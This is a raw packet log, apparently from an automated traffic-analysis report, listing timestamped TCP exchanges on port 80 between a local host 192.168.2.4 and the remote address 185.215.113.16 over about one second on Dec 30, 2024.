Dec 30, 2024 15:53:35.624135971 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624141932 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.624150991 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624166965 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624170065 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.624181986 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624191999 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.624197006 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624223948 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.624463081 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624478102 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624494076 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624501944 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.624510050 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624526024 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624541044 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624546051 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.624563932 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.624566078 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624582052 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624597073 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624614000 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624618053 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.624629021 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624639034 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.624644995 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624660969 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624675989 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624691010 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624695063 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.624706030 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624718904 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.624730110 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624737978 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.624744892 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624762058 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624787092 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.624809980 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.625099897 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.625116110 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.625130892 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.625145912 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.625161886 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.625166893 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.625176907 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.625196934 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.625200987 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.625211954 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.625221968 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.625231028 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.625247955 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.625252008 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.625263929 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.625278950 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.625288010 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.625338078 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.625523090 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.625539064 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.625555038 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.625575066 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.670804024 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.933008909 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.291277885 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.730443954 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.730510950 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.730607986 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.730659008 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.731344938 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.731379986 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.731395960 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.731427908 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.731452942 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.731468916 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.731483936 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.731496096 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.731520891 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.731571913 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.731586933 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.731601954 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.731617928 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.731633902 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.731642962 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.731674910 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.731709003 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.731724024 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.731739044 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.731781006 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.731813908 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.731831074 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.731846094 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.731861115 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.731868982 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.731875896 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.731892109 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.731905937 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.731935978 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.732131004 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732151985 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732167959 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732182980 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732193947 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.732198954 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732214928 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732223034 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.732230902 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732244968 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732264042 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.732270002 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732285023 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732291937 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.732300043 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732314110 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732317924 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.732328892 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732343912 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732359886 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.732361078 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732386112 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.732553959 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732568979 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732584000 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732599974 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732614994 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732625008 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.732656002 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.732711077 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732724905 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732732058 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732754946 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732770920 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732772112 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.732784986 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732800961 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732809067 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.732816935 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732824087 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.732835054 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732846975 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.732861996 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.732891083 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.733064890 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733079910 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733094931 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733103991 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733138084 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733146906 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.733155012 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733170033 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733184099 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733197927 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733201027 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.733213902 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733218908 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.733228922 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733243942 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733252048 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.733258963 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733273983 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733289003 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733299017 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.733304977 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733328104 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.733347893 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.733747959 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733764887 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733778954 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733787060 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733800888 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733822107 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.733823061 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733839989 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733855009 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733874083 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.733884096 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733896971 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.733897924 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733913898 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733928919 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733943939 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733949900 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.733958960 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733973980 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.733975887 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.733989000 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734003067 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.734008074 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734023094 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734029055 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.734039068 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734052896 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734064102 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.734069109 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734081984 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734091043 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.734097958 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734113932 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734127998 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.734148026 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.734523058 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734538078 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734553099 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734575987 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734591007 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734599113 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.734606028 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734621048 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734628916 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.734635115 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734646082 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.734648943 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734663010 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734671116 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.734678030 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734694958 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734726906 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.734751940 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.734875917 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734891891 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734906912 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734921932 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734936953 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734949112 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.734951973 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734962940 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.734967947 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734983921 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734992027 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.734992027 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.735006094 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.735028982 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.735029936 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.735044956 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.735054016 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.735060930 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.735074997 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.735090971 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.735099077 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.735105991 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.735116959 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.735121965 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.735136986 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.735143900 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.735152006 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.735167027 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.735173941 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.735183001 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.735197067 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.735212088 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.735224962 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.735224962 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.735239983 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.735241890 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.735255003 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.735263109 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.735270023 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.735284090 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.735294104 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.735965014 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.735981941 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.735996008 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736010075 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736023903 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736028910 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.736040115 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736056089 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736071110 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736078024 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.736088037 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736093044 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.736104012 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736112118 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.736119986 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736135006 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736148119 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736162901 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736172915 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.736177921 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736193895 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736202002 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.736210108 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736226082 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736236095 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.736241102 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736249924 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.736254930 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736265898 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.736270905 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736287117 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736299992 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.736301899 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736319065 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736325026 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.736358881 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.736677885 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736691952 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736706972 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736722946 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736737967 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736752987 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736756086 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.736767054 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736777067 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.736783028 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736794949 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.736799002 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736820936 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736823082 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.736836910 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736869097 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736880064 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.736884117 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736898899 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736913919 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736917019 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.736928940 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736953020 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.736958027 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736973047 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.736980915 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.736990929 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737005949 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737015963 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.737020969 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737035036 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737041950 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.737051010 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737067938 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737076044 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.737082005 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737097979 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737104893 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.737112999 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737127066 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737140894 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.737153053 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737169027 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737185955 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737193108 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.737201929 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.737212896 CET	49744	80	192.168.2.4	185.215.113.16
